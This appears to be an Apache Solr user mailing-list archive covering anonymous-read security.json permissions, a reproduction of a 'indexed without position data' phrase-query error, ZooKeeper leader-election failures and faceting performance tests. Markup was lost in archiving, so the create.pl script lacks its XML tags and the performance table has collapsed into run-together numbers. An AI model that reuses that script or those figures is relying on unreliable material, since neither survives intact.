predefined permissions and it worked as well.  Thanks again!

On Tue, Jun 6, 2017 at 2:08 PM, Oakley, Craig (NIH/NLM/NCBI) [C] <
craig.oak...@nih.gov> wrote:

> We usually end security.json with the permissions
>
>{
> "name":"open_select",
>  "path":"/select/*",
>  "role":null},
>  {
> "name":"all-admin",
> "collection":null,
> "path":"/*",
> "role":"allgen"},
>  {
> "name":"all-core-handlers",
> "path":"/*",
>  "role":"allgen"}]
>  } }
>
>
> ...and then assign the "allgen" role to all users
>
> This allows a select without a login & password, but requires a login &
> password for anything else (including the front page of the GUI)
>
> -Original Message-
> From: Solr User [mailto:solr...@gmail.com]
> Sent: Tuesday, June 06, 2017 2:27 PM
> To: solr-user@lucene.apache.org
> Subject: Anonymous Read?
>
> Is it possible to setup Solr security to allow anonymous query (/select
> etc.) but restricted access to other permissions as described in
> https://lucidworks.com/2015/08/17/securing-solr-basic-
> auth-permission-rules/
> ?
>


Anonymous Read?

2017-06-06 Thread Solr User
Is it possible to setup Solr security to allow anonymous query (/select
etc.) but restricted access to other permissions as described in
https://lucidworks.com/2015/08/17/securing-solr-basic-auth-permission-rules/
?


Re: Work-around for "indexed without position data"

2017-06-05 Thread Solr User
Sorry for the delay.  I was able to reproduce this easily with my setup,
but reproducing this on a Solr example proved challenging.  Hopefully the
work that I did to find the situation in which this is produced will help
in resolving the problem.  The driving factor for this appears to be how
updates are sent to Solr.  When sending batches of updates with commits,
the problem is reproduced.  If the commit is held until after all updates
are sent, then no problem is produced.  This leads me to believe that this
issue has something to do with overlapping commits or index merges.  This
was reproducible regardless of running classic or managed schema and
regardless of running Solr core or SolrCloud.

There are not many steps to reproduce this, but you will need a way to send
these updates.  I have included inline create.sh and create.pl scripts to
generate the data and send the updates.  You can index a lastModified field
or something to convince yourself that everything has been re-indexed.  I
left that out to keep the steps lean.  Also, this test is using commit
statements from the client sending the updates for simplicity even though
it is not a good practice.  My normal setup is using Solrj with
commitWithin to allow Solr to manage when the commits take place, but the
same error is produced either way.


*STEPS TO REPRODUCE*

   1. Install Solr 5.5.3 and change to that working directory
   2. bin/solr -e techproducts
   3. bin/solr stop [Why these next 3 steps?  These are to start the
   index completely new without the 32 example documents as opposed to a
   delete query.  The documents are not posted after the core is detected the
   second time.]
   4. rm -rf ./example/techproducts/solr/techproducts/data/
   5. bin/solr -e techproducts
   6. ./create.sh
   7. curl -X POST -H 'Content-type:application/json' --data-binary '{
   "replace-field":{ "name":"cat", "type":"text_en_splitting", "indexed":true,
   "multiValued":true, "stored":true } }'
   http://localhost:8983/solr/techproducts/schema
   8.
   http://localhost:8983/solr/techproducts/select?q=cat:%22hard%20drive%22
   [error]
   9. ./create.sh
   10.
   http://localhost:8983/solr/techproducts/select?q=cat:%22hard%20drive%22
   [error even though all documents have been re-indexed]

*create.sh*
#!/bin/bash
for i in {1..100}; do
echo "$i"
./create.pl $i > ./create.xml$i
curl http://localhost:8983/solr/techproducts/update?commit=true -H
"Content-Type: text/xml" --data-binary @./create.xml$i
done

*create.pl <http://create.pl>*
#!/usr/bin/perl
my $S = $ARGV[0];
my $I = 100;
my $N = $S*$I + $I;
my $i;
print "\n";
for($i=$S*$I; $i<$N; $i++) {
   print "SP${i}cat
hard drive ${i}\n";
}
print "\n";


On Fri, May 26, 2017 at 2:14 AM, Rick Leir <rl...@leirtech.com> wrote:

> Can you reproduce this error? What are the steps you take to reproduce it?
> ( simple is better).
>
> cheers -- Rick
>
>
>
> On 2017-05-25 05:46 PM, Solr User wrote:
>
>> This is in regards to changing a field type from string to
>> text_en_splitting, re-indexing all documents, even optimizing to give the
>> index a chance to merge segments and rewrite itself entirely, and then
>> getting this error when running a phrase query:
>> java.lang.IllegalStateException: field "blah" was indexed without
>> position
>> data; cannot run PhraseQuery
>>
>> I have encountered this issue before and have always done one of the
>> following as a work-around:
>> 1.  Instead of changing the field type on an existing field just create a
>> new field and retire the old one.
>> 2.  Delete the index directory and start from scratch.
>>
>> These work-arounds are not always ideal.  Does anyone know what is holding
>> onto that old field type definition?  What thinks it is still a string?
>> Every document has been re-indexed and I am sure of this because I have a
>> time stamp indexed.  Is there any other way to get this to work?
>>
>> For what it is worth, I am running this in SolrCloud mode but I remember
>> seeing this issue before SolrCloud was released as well.
>>
>>
>


Work-around for "indexed without position data"

2017-05-25 Thread Solr User
This is in regards to changing a field type from string to
text_en_splitting, re-indexing all documents, even optimizing to give the
index a chance to merge segments and rewrite itself entirely, and then
getting this error when running a phrase query:
java.lang.IllegalStateException: field "blah" was indexed without position
data; cannot run PhraseQuery

I have encountered this issue before and have always done one of the
following as a work-around:
1.  Instead of changing the field type on an existing field just create a
new field and retire the old one.
2.  Delete the index directory and start from scratch.

These work-arounds are not always ideal.  Does anyone know what is holding
onto that old field type definition?  What thinks it is still a string?
Every document has been re-indexed and I am sure of this because I have a
time stamp indexed.  Is there any other way to get this to work?

For what it is worth, I am running this in SolrCloud mode but I remember
seeing this issue before SolrCloud was released as well.


Re: Faceting and Grouping Performance Degradation in Solr 5

2017-02-06 Thread Solr User
I am pleased to report that we are in Production on Solr 5.5.3 with
comparable performance to Solr 4.8.1 through leveraging facet.method=uif as
well as https://issues.apache.org/jira/browse/SOLR-9176.  Thanks to
everyone who worked on these!

On Mon, Oct 3, 2016 at 3:55 PM, Solr User <solr...@gmail.com> wrote:

> Below is some further testing.  This was done in an environment that had
> no other queries or updates during testing.  We ran through several
> scenarios so I pasted this with HTML formatting below so you may view this
> as a table.  Sorry if you have to pull this out into a different file for
> viewing, but I did not want the formatting to be messed up.  The times are
> average times in milliseconds.  Same test methodology as above except there
> was a 5 minute warmup and a 15 minute test.
>
> Note that both the segment and deletions were recorded from only 1 out of
> 2 of the shards so we cannot try to extrapolate a function between them and
> the outcome.  In other words, just view them as "non-optimized" versus
> "optimized" and "has deletions" versus "no deletions".  The only exceptions
> are the 0 deletes were true for both shards and the 1 segment and 8 segment
> cases were true for both shards.  A few of the tests were repeated as well.
>
> The only conclusion that I could draw is that the number of segments and
> the number of deletes appear to greatly influence the response times, at
> least more than any difference in Solr version.  There also appears to be
> some external contributor to variancemaybe network, etc.
>
> Thoughts?
>
>
> Date9/29/20169/29/
> 20169/29/20169/30/20169/30/
> 20169/30/20169/30/20169/30/
> 20169/30/20169/30/20169/30/
> 20169/30/20169/30/201610/3/
> 201610/3/201610/3/201610/3/2016Solr
> Version5.5.25.5.24.8.14.
> 8.14.8.15.5.25.5.25.5.2<
> /td>5.5.25.5.25.5.25.5.2 td>5.5.24.8.14.8.14.8.1 td>4.8.1Deleted Docs57873
> 57873176958593694593694
> 578735787357873578730<
> /td>00<
> /td>0Segment Count3434 td>1827273434<
> td>34348811 td>8811
> facet.method=uifYESYESN/A<
> td>N/AN/AYESYESNO td>NONOYESYESNO td>N/AN/AN/AN/AScenario
> #1198210145186<
> td>190208209210206 td>1091427370160 td>1098385Scenario
> #29288596258 td>7270777468<
> td>7363616654
> 5251
>
>
>
>
> On Wed, Sep 28, 2016 at 4:44 PM, Solr User <solr...@gmail.com> wrote:
>
>> I plan to re-test this in a separate environment that I have more control
>> over and will share the results when I can.
>>
>> On Wed, Sep 28, 2016 at 3:37 PM, Solr User <solr...@gmail.com> wrote:
>>
>>> Certainly.  And I would of course welcome anyone else to test this for
>>> themselves especially with facet.method=uif to see if that has indeed
>>> bridged the gap between Solr 4 and Solr 5.  I would be very happy if my
>>> testing is invalid due to variance, problem in process, etc.  One thing I
>>> was pondering is if I should force merge the index to a certain amount of
>>> segments because indexing yields a random number of segments and
>>> deletions.  The only thing stopping me short of doing that were
>>> observations of longer Solr 4 times even with more deletions and similar
>>> number of segments.
>>>
>>> We use Soasta as our testing tool.  Before testing, load is sent for
>>> 10-15 minutes to make sure any Solr caches have stabilized.  Then the test
>>> is run for 30 minutes of steady volume with Scenario #1 tested at 15
>>> req/sec and Scenario #2 tested at 100 req/sec.  Each request is different
>>> with input being pulled from data files.  The requests are repeatable test
>>> to test.
>>>
>>> The numbers posted above are average response times as reported by
>>> Soasta.  However, respective time differences are supported by Splunk which
>>> indexes the Solr logs and Dynatrace which is instrumented on one of the
>>> JVM's.
>>>
>>> The versions are deployed to the same machines thereby overlaying the
>>> previous installation.  Going Solr 4 to Solr 5, full indexing is run with
>>> the same input data.  Being in SolrCloud mode, the full indexing comprises
>>> of indexing all documents and then deleting any that were not touched.
>>> Going Solr 5 back to Solr 4, the snapshot is restored since Solr 4 will not
>>> load with a Solr 5 index.  Testing Solr 4 after reverting yields the same
>>> results as the previous Solr 4 test.
>>>
>>>
>>> On Wed, Sep 28, 2016 at 4:02 AM, Toke Eskildsen <t...@statsbiblioteket.dk>
>>>

Re: 6.4.0 collection leader election and recovery issues

2017-02-02 Thread Ravi Solr
Thanks Shawn. Yes I did index some docs after moving to 6.4.0. The release
notes did not mention anything about format being changed so I thought it
would be backward compatible. Yeah my only recourse is to re-index data.
Apart from that it was weird problems overall with 6.4.0. I was excited
about using the unified highlighter but the zookeeper flakiness and
constant disconnections of solr and sometimes not electing a leader for
some collections made me rollback.

Anyway thanks for promptly responding, will be more careful form next time.

Thanks

Ravi Kiran Bhaskar



On Thu, Feb 2, 2017 at 9:41 AM, Shawn Heisey <apa...@elyograg.org> wrote:

> On 2/2/2017 7:23 AM, Ravi Solr wrote:
> > When i try to rollback from 6.4.0 to my original version of 6.0.1 it now
> > throws another issue. Now I cant go to 6.4.0 nor can I roll back to 6.0.1
> >
> > Could not load codec 'Lucene62'.  Did you forget to add
> > lucene-backward-codecs.jar?
> > at org.apache.lucene.index.SegmentInfos.readCodec(
> SegmentInfos.java:429)
> > at
> > org.apache.lucene.index.SegmentInfos.readCommit(SegmentInfos.java:349)
> > at
> > org.apache.lucene.index.SegmentInfos.readCommit(SegmentInfos.java:284)
> >
> > Hope this doesnt cost me dearly. Any ideas at least on how to rollback
> > safely.
>
> This sounds like you did some indexing after the upgrade, or possibly
> some index optimizing, so the parts of the index that were written (or
> merged) by the newer version are now in a format that the older version
> cannot use.  Perhaps the merge policy was changed, causing Solr to do
> some automatic merges once it started up.  I am not aware of anything in
> Solr that would write new segments without indexing input or a merge
> policy change.
>
> As far as I know, there is no straightforward way to go backwards with
> the index format.  If you want to downgrade and don't have a backup of
> your indexes from before the upgrade, you'll probably need to wipe the
> index directory and completely reindex.
>
> Solr will always use the newest default index format for new segments
> when you upgrade.  Contrary to many user expectations, setting
> luceneMatchVersion will *NOT* affect the index format, only the behavior
> of components that do field analysis.
>
> Downgrading the index format would involve writing a custom Lucene
> program that changes the active index format to the older version, then
> runs a forceMerge on the index.  It would be completely separate from
> Solr, and definitely not straightforward.
>
> Thanks,
> Shawn
>
>


Re: 6.4.0 collection leader election and recovery issues

2017-02-02 Thread Ravi Solr
Thanks Hendrik. Iam baffled as to why I did not hit this issue prior to
moving to 6.4.0.

On Thu, Feb 2, 2017 at 7:58 AM, Hendrik Haddorp <hendrik.hadd...@gmx.net>
wrote:

> Might be that your overseer queue overloaded. Similar to what is described
> here:
> https://support.lucidworks.com/hc/en-us/articles/203959903-
> Bringing-up-downed-Solr-servers-that-don-t-want-to-come-up
>
> If the overseer queue gets too long you get hit by this:
> https://github.com/Netflix/curator/wiki/Tech-Note-4
>
> Try to request the overseer status 
> (/solr/admin/collections?action=OVERSEERSTATUS).
> If that fails you likely hit that problem. If so you can also not use the
> ZooKeeper command line client anymore. You can now restart all your ZK
> nodes with an increases jute.maxbuffer value. Once ZK is restarted you can
> use the ZK command line client with the same jute.maxbuffer value and check
> how many entries /overseer/queue has in ZK. Normally there should be a few
> entries but if you see thousands then you should delete them. I used a few
> lines of Java code for that, again setting jute.maxbuffer to the same
> value. Once cleaned up restart the Solr nodes one by one and keep an eye on
> the overseer status.
>
>
> On 02.02.2017 10:52, Ravi Solr wrote:
>
>> Following up on my previous email, the intermittent server unavailability
>> seems to be linked to the interaction between Solr and Zookeeper. Can
>> somebody help me understand what this error means and how to recover from
>> it.
>>
>> 2017-02-02 09:44:24.648 ERROR
>> (recoveryExecutor-3-thread-16-processing-n:xx.xxx.xxx.xxx:1234_solr
>> x:clicktrack_shard1_replica4 s:shard1 c:clicktrack r:core_node3)
>> [c:clicktrack s:shard1 r:core_node3 x:clicktrack_shard1_replica4]
>> o.a.s.c.RecoveryStrategy Error while trying to recover.
>> core=clicktrack_shard1_replica4:org.apache.zookeeper.KeeperE
>> xception$SessionExpiredException:
>> KeeperErrorCode = Session expired for /overseer/queue/qn-
>>  at org.apache.zookeeper.KeeperException.create(KeeperException.
>> java:127)
>>  at org.apache.zookeeper.KeeperException.create(KeeperException.
>> java:51)
>>  at org.apache.zookeeper.ZooKeeper.create(ZooKeeper.java:783)
>>  at
>> org.apache.solr.common.cloud.SolrZkClient$9.execute(SolrZkCl
>> ient.java:391)
>>  at
>> org.apache.solr.common.cloud.SolrZkClient$9.execute(SolrZkCl
>> ient.java:388)
>>  at
>> org.apache.solr.common.cloud.ZkCmdExecutor.retryOperation(Zk
>> CmdExecutor.java:60)
>>  at
>> org.apache.solr.common.cloud.SolrZkClient.create(SolrZkClient.java:388)
>>  at
>> org.apache.solr.cloud.DistributedQueue.offer(DistributedQueue.java:244)
>>  at org.apache.solr.cloud.ZkController.publish(ZkController.
>> java:1215)
>>  at org.apache.solr.cloud.ZkController.publish(ZkController.
>> java:1128)
>>  at org.apache.solr.cloud.ZkController.publish(ZkController.
>> java:1124)
>>  at
>> org.apache.solr.cloud.RecoveryStrategy.doRecovery(RecoverySt
>> rategy.java:334)
>>  at org.apache.solr.cloud.RecoveryStrategy.run(RecoveryStrategy.
>> java:222)
>>  at
>> com.codahale.metrics.InstrumentedExecutorService$Instrumente
>> dRunnable.run(InstrumentedExecutorService.java:176)
>>  at
>> java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)
>>  at java.util.concurrent.FutureTask.run(FutureTask.java:266)
>>  at
>> org.apache.solr.common.util.ExecutorUtil$MDCAwareThreadPoolE
>> xecutor.lambda$execute$0(ExecutorUtil.java:229)
>>  at
>> java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPool
>> Executor.java:1142)
>>  at
>> java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoo
>> lExecutor.java:617)
>>  at java.lang.Thread.run(Thread.java:745)
>>
>> Thanks
>>
>> Ravi Kiran Bhaskar
>>
>> On Thu, Feb 2, 2017 at 2:27 AM, Ravi Solr <ravis...@gmail.com> wrote:
>>
>> Hello,
>>>   Yesterday I upgraded from 6.0.1 to 6.4.0, its been straight 12
>>> hours of debugging spree!! Can somebody kindly help me  out of this
>>> misery.
>>>
>>> I have a set has 8 single shard collections with 3 replicas. As soon as I
>>> updated the configs and started the servers one of my collection got
>>> stuck
>>> with no leader. I have restarted solr to no avail, I also tried to force
>>> a
>>> leader via collections API that dint work either. I also see that, from
>>> time to time multiple solr nodes go down all at the sam

Re: 6.4.0 collection leader election and recovery issues

2017-02-02 Thread Ravi Solr
When i try to rollback from 6.4.0 to my original version of 6.0.1 it now
throws another issue. Now I cant go to 6.4.0 nor can I roll back to 6.0.1

Could not load codec 'Lucene62'.  Did you forget to add
lucene-backward-codecs.jar?
at org.apache.lucene.index.SegmentInfos.readCodec(SegmentInfos.java:429)
at
org.apache.lucene.index.SegmentInfos.readCommit(SegmentInfos.java:349)
at
org.apache.lucene.index.SegmentInfos.readCommit(SegmentInfos.java:284)

Hope this doesnt cost me dearly. Any ideas at least on how to rollback
safely.

Thanks

Ravi Kiran Bhaskar

On Thu, Feb 2, 2017 at 4:52 AM, Ravi Solr <ravis...@gmail.com> wrote:

> Following up on my previous email, the intermittent server unavailability
> seems to be linked to the interaction between Solr and Zookeeper. Can
> somebody help me understand what this error means and how to recover from
> it.
>
> 2017-02-02 09:44:24.648 ERROR (recoveryExecutor-3-thread-16-
> processing-n:xx.xxx.xxx.xxx:1234_solr x:clicktrack_shard1_replica4
> s:shard1 c:clicktrack r:core_node3) [c:clicktrack s:shard1 r:core_node3
> x:clicktrack_shard1_replica4] o.a.s.c.RecoveryStrategy Error while trying
> to recover. core=clicktrack_shard1_replica4:org.apache.zookeeper.
> KeeperException$SessionExpiredException: KeeperErrorCode = Session
> expired for /overseer/queue/qn-
> at org.apache.zookeeper.KeeperException.create(
> KeeperException.java:127)
> at org.apache.zookeeper.KeeperException.create(
> KeeperException.java:51)
> at org.apache.zookeeper.ZooKeeper.create(ZooKeeper.java:783)
> at org.apache.solr.common.cloud.SolrZkClient$9.execute(
> SolrZkClient.java:391)
> at org.apache.solr.common.cloud.SolrZkClient$9.execute(
> SolrZkClient.java:388)
> at org.apache.solr.common.cloud.ZkCmdExecutor.retryOperation(
> ZkCmdExecutor.java:60)
> at org.apache.solr.common.cloud.SolrZkClient.create(
> SolrZkClient.java:388)
> at org.apache.solr.cloud.DistributedQueue.offer(
> DistributedQueue.java:244)
> at org.apache.solr.cloud.ZkController.publish(ZkController.java:1215)
> at org.apache.solr.cloud.ZkController.publish(ZkController.java:1128)
> at org.apache.solr.cloud.ZkController.publish(ZkController.java:1124)
> at org.apache.solr.cloud.RecoveryStrategy.doRecovery(
> RecoveryStrategy.java:334)
> at org.apache.solr.cloud.RecoveryStrategy.run(
> RecoveryStrategy.java:222)
> at com.codahale.metrics.InstrumentedExecutorService$
> InstrumentedRunnable.run(InstrumentedExecutorService.java:176)
> at java.util.concurrent.Executors$RunnableAdapter.
> call(Executors.java:511)
> at java.util.concurrent.FutureTask.run(FutureTask.java:266)
> at org.apache.solr.common.util.ExecutorUtil$
> MDCAwareThreadPoolExecutor.lambda$execute$0(ExecutorUtil.java:229)
> at java.util.concurrent.ThreadPoolExecutor.runWorker(
> ThreadPoolExecutor.java:1142)
> at java.util.concurrent.ThreadPoolExecutor$Worker.run(
> ThreadPoolExecutor.java:617)
> at java.lang.Thread.run(Thread.java:745)
>
> Thanks
>
> Ravi Kiran Bhaskar
>
> On Thu, Feb 2, 2017 at 2:27 AM, Ravi Solr <ravis...@gmail.com> wrote:
>
>> Hello,
>>  Yesterday I upgraded from 6.0.1 to 6.4.0, its been straight 12
>> hours of debugging spree!! Can somebody kindly help me  out of this misery.
>>
>> I have a set has 8 single shard collections with 3 replicas. As soon as I
>> updated the configs and started the servers one of my collection got stuck
>> with no leader. I have restarted solr to no avail, I also tried to force a
>> leader via collections API that dint work either. I also see that, from
>> time to time multiple solr nodes go down all at the same time, only a
>> restart resolves the issue.
>>
>> The error snippets are shown below
>>
>> 2017-02-02 01:43:42.785 ERROR (recoveryExecutor-3-thread-6-processing-n:
>> 10.128.159.245:9001_solr x:clicktrack_shard1_replica1 s:shard1
>> c:clicktrack r:core_node1) [c:clicktrack s:shard1 r:core_node1
>> x:clicktrack_shard1_replica1] o.a.s.c.RecoveryStrategy Error while trying
>> to recover. 
>> core=clicktrack_shard1_replica1:org.apache.solr.common.SolrException:
>> No registered leader was found after waiting for 4000ms , collection:
>> clicktrack slice: shard1
>>
>> solr.log.9:2017-02-02 01:43:41.336 INFO  (zkCallback-4-thread-29-proces
>> sing-n:10.128.159.245:9001_solr) [   ] o.a.s.c.c.ZkStateReader A cluster
>> state change: [WatchedEvent state:SyncConnected type:NodeDataChanged
>> path:/collections/clicktrack/state.json] for collection [clicktrack] has
>> occurred - updating... (live nodes size: [1])
>> solr.log.9:2017-02-02 01:43:42.224 INFO  (zkCallback-4-thread-29-proces
&

Re: 6.4.0 collection leader election and recovery issues

2017-02-02 Thread Ravi Solr
Following up on my previous email, the intermittent server unavailability
seems to be linked to the interaction between Solr and Zookeeper. Can
somebody help me understand what this error means and how to recover from
it.

2017-02-02 09:44:24.648 ERROR
(recoveryExecutor-3-thread-16-processing-n:xx.xxx.xxx.xxx:1234_solr
x:clicktrack_shard1_replica4 s:shard1 c:clicktrack r:core_node3)
[c:clicktrack s:shard1 r:core_node3 x:clicktrack_shard1_replica4]
o.a.s.c.RecoveryStrategy Error while trying to recover.
core=clicktrack_shard1_replica4:org.apache.zookeeper.KeeperException$SessionExpiredException:
KeeperErrorCode = Session expired for /overseer/queue/qn-
at org.apache.zookeeper.KeeperException.create(KeeperException.java:127)
at org.apache.zookeeper.KeeperException.create(KeeperException.java:51)
at org.apache.zookeeper.ZooKeeper.create(ZooKeeper.java:783)
at
org.apache.solr.common.cloud.SolrZkClient$9.execute(SolrZkClient.java:391)
at
org.apache.solr.common.cloud.SolrZkClient$9.execute(SolrZkClient.java:388)
at
org.apache.solr.common.cloud.ZkCmdExecutor.retryOperation(ZkCmdExecutor.java:60)
at
org.apache.solr.common.cloud.SolrZkClient.create(SolrZkClient.java:388)
at
org.apache.solr.cloud.DistributedQueue.offer(DistributedQueue.java:244)
at org.apache.solr.cloud.ZkController.publish(ZkController.java:1215)
at org.apache.solr.cloud.ZkController.publish(ZkController.java:1128)
at org.apache.solr.cloud.ZkController.publish(ZkController.java:1124)
at
org.apache.solr.cloud.RecoveryStrategy.doRecovery(RecoveryStrategy.java:334)
at org.apache.solr.cloud.RecoveryStrategy.run(RecoveryStrategy.java:222)
at
com.codahale.metrics.InstrumentedExecutorService$InstrumentedRunnable.run(InstrumentedExecutorService.java:176)
at
java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)
at java.util.concurrent.FutureTask.run(FutureTask.java:266)
at
org.apache.solr.common.util.ExecutorUtil$MDCAwareThreadPoolExecutor.lambda$execute$0(ExecutorUtil.java:229)
at
java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
at
java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
at java.lang.Thread.run(Thread.java:745)

Thanks

Ravi Kiran Bhaskar

On Thu, Feb 2, 2017 at 2:27 AM, Ravi Solr <ravis...@gmail.com> wrote:

> Hello,
>  Yesterday I upgraded from 6.0.1 to 6.4.0, its been straight 12
> hours of debugging spree!! Can somebody kindly help me  out of this misery.
>
> I have a set has 8 single shard collections with 3 replicas. As soon as I
> updated the configs and started the servers one of my collection got stuck
> with no leader. I have restarted solr to no avail, I also tried to force a
> leader via collections API that dint work either. I also see that, from
> time to time multiple solr nodes go down all at the same time, only a
> restart resolves the issue.
>
> The error snippets are shown below
>
> 2017-02-02 01:43:42.785 ERROR (recoveryExecutor-3-thread-6-processing-n:
> 10.128.159.245:9001_solr x:clicktrack_shard1_replica1 s:shard1
> c:clicktrack r:core_node1) [c:clicktrack s:shard1 r:core_node1
> x:clicktrack_shard1_replica1] o.a.s.c.RecoveryStrategy Error while trying
> to recover. 
> core=clicktrack_shard1_replica1:org.apache.solr.common.SolrException:
> No registered leader was found after waiting for 4000ms , collection:
> clicktrack slice: shard1
>
> solr.log.9:2017-02-02 01:43:41.336 INFO  (zkCallback-4-thread-29-
> processing-n:10.128.159.245:9001_solr) [   ] o.a.s.c.c.ZkStateReader A
> cluster state change: [WatchedEvent state:SyncConnected
> type:NodeDataChanged path:/collections/clicktrack/state.json] for
> collection [clicktrack] has occurred - updating... (live nodes size: [1])
> solr.log.9:2017-02-02 01:43:42.224 INFO  (zkCallback-4-thread-29-
> processing-n:10.128.159.245:9001_solr) [   ] o.a.s.c.c.ZkStateReader A
> cluster state change: [WatchedEvent state:SyncConnected
> type:NodeDataChanged path:/collections/clicktrack/state.json] for
> collection [clicktrack] has occurred - updating... (live nodes size: [1])
> solr.log.9:2017-02-02 01:43:43.767 INFO  (zkCallback-4-thread-23-
> processing-n:10.128.159.245:9001_solr) [   ] o.a.s.c.c.ZkStateReader A
> cluster state change: [WatchedEvent state:SyncConnected
> type:NodeDataChanged path:/collections/clicktrack/state.json] for
> collection [clicktrack] has occurred - updating... (live nodes size: [1])
>
>
> Suspecting the worst I backed up the index and renamed the collection's
> data folder and restarted the servers, this time the collection got a
> proper leader. So is my index really corrupted ? Solr UI showed live nodes
> just like the logs but without any leader. Even with the leader issue
> somewhat alleviated after renaming the data folder and letting silr create
> a ne

6.4.0 collection leader election and recovery issues

2017-02-01 Thread Ravi Solr
Hello,
 Yesterday I upgraded from 6.0.1 to 6.4.0, its been straight 12
hours of debugging spree!! Can somebody kindly help me  out of this misery.

I have a set has 8 single shard collections with 3 replicas. As soon as I
updated the configs and started the servers one of my collection got stuck
with no leader. I have restarted solr to no avail, I also tried to force a
leader via collections API that dint work either. I also see that, from
time to time multiple solr nodes go down all at the same time, only a
restart resolves the issue.

The error snippets are shown below

2017-02-02 01:43:42.785 ERROR
(recoveryExecutor-3-thread-6-processing-n:10.128.159.245:9001_solr
x:clicktrack_shard1_replica1 s:shard1 c:clicktrack r:core_node1)
[c:clicktrack s:shard1 r:core_node1 x:clicktrack_shard1_replica1]
o.a.s.c.RecoveryStrategy Error while trying to recover.
core=clicktrack_shard1_replica1:org.apache.solr.common.SolrException: No
registered leader was found after waiting for 4000ms , collection:
clicktrack slice: shard1

solr.log.9:2017-02-02 01:43:41.336 INFO
(zkCallback-4-thread-29-processing-n:10.128.159.245:9001_solr) [   ]
o.a.s.c.c.ZkStateReader A cluster state change: [WatchedEvent
state:SyncConnected type:NodeDataChanged
path:/collections/clicktrack/state.json] for collection [clicktrack] has
occurred - updating... (live nodes size: [1])
solr.log.9:2017-02-02 01:43:42.224 INFO
(zkCallback-4-thread-29-processing-n:10.128.159.245:9001_solr) [   ]
o.a.s.c.c.ZkStateReader A cluster state change: [WatchedEvent
state:SyncConnected type:NodeDataChanged
path:/collections/clicktrack/state.json] for collection [clicktrack] has
occurred - updating... (live nodes size: [1])
solr.log.9:2017-02-02 01:43:43.767 INFO
(zkCallback-4-thread-23-processing-n:10.128.159.245:9001_solr) [   ]
o.a.s.c.c.ZkStateReader A cluster state change: [WatchedEvent
state:SyncConnected type:NodeDataChanged
path:/collections/clicktrack/state.json] for collection [clicktrack] has
occurred - updating... (live nodes size: [1])


Suspecting the worst I backed up the index and renamed the collection's
data folder and restarted the servers, this time the collection got a
proper leader. So is my index really corrupted ? Solr UI showed live nodes
just like the logs but without any leader. Even with the leader issue
somewhat alleviated after renaming the data folder and letting silr create
a new data folder my servers did go down a couple of times.

I am not all that well versed with zookeeper...any trick to make zookeeper
pick a leader and be happy ? Did anybody have solr/zookeeper issues with
6.4.0 ?

Thanks

Ravi Kiran Bhaskar


Re: ClassNotFoundException with Custom ZkACLProvider

2016-11-15 Thread Solr User
For those interested, I ended up bundling the customized ACL provider with
the solr.war.  I could not stomach looking at the stack trace in the logs.

On Mon, Nov 7, 2016 at 4:47 PM, Solr User <solr...@gmail.com> wrote:

> This is mostly just an FYI regarding future work on issues like SOLR-8792.
>
> I wanted admin update but world read on ZK since I do not have anything
> sensitive from a read perspective in the Solr data and did not want to
> force all SolrCloud clients to implement authentication just for read.  So,
> I extended DefaultZkACLProvider and implemented a replacement for
> VMParamsAllAndReadonlyDigestZkACLProvider.
>
> My custom code is loaded from the sharedLib in solr.xml.  However, there
> is a temporary ZK lookup to read solr.xml (and chroot) which is obviously
> done before loading sharedLib.  Therefore, I am faced with a
> ClassNotFoundException.  This has no negative effect on the ACL
> functionalityjust the annoying stack trace in the logs.  I do not want
> to package this custom code with the Solr code and do not want to package
> this along with Solr dependencies in the Jetty lib/ext.
>
> So, I am planning to live with the stack trace and just wanted to share
> this for any future work on the dynamic solr.xml and chroot lookups or in
> case I am missing some work-around.
>
> Thanks!
>
>


ClassNotFoundException with Custom ZkACLProvider

2016-11-07 Thread Solr User
This is mostly just an FYI regarding future work on issues like SOLR-8792.

I wanted admin update but world read on ZK since I do not have anything
sensitive from a read perspective in the Solr data and did not want to
force all SolrCloud clients to implement authentication just for read.  So,
I extended DefaultZkACLProvider and implemented a replacement for
VMParamsAllAndReadonlyDigestZkACLProvider.

My custom code is loaded from the sharedLib in solr.xml.  However, there is
a temporary ZK lookup to read solr.xml (and chroot) which is obviously done
before loading sharedLib.  Therefore, I am faced with a
ClassNotFoundException.  This has no negative effect on the ACL
functionalityjust the annoying stack trace in the logs.  I do not want
to package this custom code with the Solr code and do not want to package
this along with Solr dependencies in the Jetty lib/ext.

So, I am planning to live with the stack trace and just wanted to share
this for any future work on the dynamic solr.xml and chroot lookups or in
case I am missing some work-around.

Thanks!


Re: Faceting and Grouping Performance Degradation in Solr 5

2016-10-03 Thread Solr User
Below is some further testing.  This was done in an environment that had no
other queries or updates during testing.  We ran through several scenarios
so I pasted this with HTML formatting below so you may view this as a
table.  Sorry if you have to pull this out into a different file for
viewing, but I did not want the formatting to be messed up.  The times are
average times in milliseconds.  Same test methodology as above except there
was a 5 minute warmup and a 15 minute test.

Note that both the segment and deletions were recorded from only 1 out of 2
of the shards so we cannot try to extrapolate a function between them and
the outcome.  In other words, just view them as "non-optimized" versus
"optimized" and "has deletions" versus "no deletions".  The only exceptions
are the 0 deletes were true for both shards and the 1 segment and 8 segment
cases were true for both shards.  A few of the tests were repeated as well.

The only conclusion that I could draw is that the number of segments and
the number of deletes appear to greatly influence the response times, at
least more than any difference in Solr version.  There also appears to be
some external contributor to variancemaybe network, etc.

Thoughts?


Date9/29/20169/29/20169/29/20169/30/20169/30/20169/30/20169/30/20169/30/20169/30/20169/30/20169/30/20169/30/20169/30/201610/3/201610/3/201610/3/201610/3/2016Solr
Version5.5.25.5.24.8.14.8.14.8.15.5.25.5.25.5.25.5.25.5.25.5.25.5.25.5.24.8.14.8.14.8.14.8.1Deleted
Docs578735787317695859369459369457873578735787357873Segment
Count34341827273434343488118811facet.method=uifYESYESN/AN/AN/AYESYESNONONOYESYESNON/AN/AN/AN/AScenario
#119821014518619020820921020610914273701601098385Scenario
#29288596258727077746873636166545251




On Wed, Sep 28, 2016 at 4:44 PM, Solr User <solr...@gmail.com> wrote:

> I plan to re-test this in a separate environment that I have more control
> over and will share the results when I can.
>
> On Wed, Sep 28, 2016 at 3:37 PM, Solr User <solr...@gmail.com> wrote:
>
